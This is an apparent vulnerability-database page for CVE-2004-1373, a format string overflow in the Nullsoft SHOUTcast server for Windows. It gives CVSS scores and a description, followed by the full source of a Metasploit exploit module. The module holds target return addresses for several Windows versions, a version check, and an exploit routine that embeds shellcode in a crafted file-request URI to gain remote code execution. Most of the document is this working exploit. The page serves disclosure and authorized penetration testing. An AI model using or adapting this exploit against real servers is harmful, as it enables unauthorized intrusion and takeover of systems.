SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow

2005-12-2614:34:22

MC <[email protected]>, mandragore <[email protected]>

www.rapid7.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON

This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow',
      'Description'    => %q{
          This module exploits a format string vulnerability in the
        Nullsoft SHOUTcast server for Windows. The vulnerability is
        triggered by requesting a file path that contains format
        string specifiers. This vulnerability was discovered by
        Tomasz Trojanowski and Damian Put.
      },
      'Author'         => [ 'MC', 'mandragore[at]gmail.com'],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-1373'],
          [ 'OSVDB', '12585'],
          [ 'BID', '12096'],
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 250,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows NT SP5/SP6a English',    { 'Ret' => 0x776a1799 }], # ws2help.dll
          ['Windows 2000 English ALL',       { 'Ret' => 0x75022ac4 }], # ws2help.dll
          ['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad }], # ws2help.dll
          ['Windows 2003 Server English',    { 'Ret' => 0x7ffc0638 }], # PEB return
        ],
      'DisclosureDate' => '2004-12-23'))

    register_options(
      [
        Opt::RPORT(8000)
      ])
  end

  def check
    r = send_request_raw({
      'uri' => uri
    }, 5)

    return Exploit::CheckCode::Safe if not r

    m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/)
    return Exploit::CheckCode::Safe if not m

    vprint_status("This system is running SHOUTcast #{m[1]} on #{m[2]}")

    # SHOUTcast Distributed Network Audio Server/win32 v1.9.2<BR>
    if (m[1] =~ /v1\.([0-8]\.|9\.[0-3])$/)
      if (m[2] == "win32")
        return Exploit::CheckCode::Appears
      else
        return Exploit::CheckCode::Detected
      end
    end

    return Exploit::CheckCode::Safe
  end

  def exploit

    num = 1046 - payload.encoded.length
    uri = '/content/%#0' + num.to_s + 'x' + payload.encoded
    uri << "\xeb\x06" + rand_text_alphanumeric(2)
    uri << [target.ret].pack('V')
    uri << "\xe9\x2d\xff\xff\xff"
    uri << '#0100x.mp3'

    print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
    send_request_raw({
      'uri' => uri
    }, 5)

    handler
    disconnect
  end
end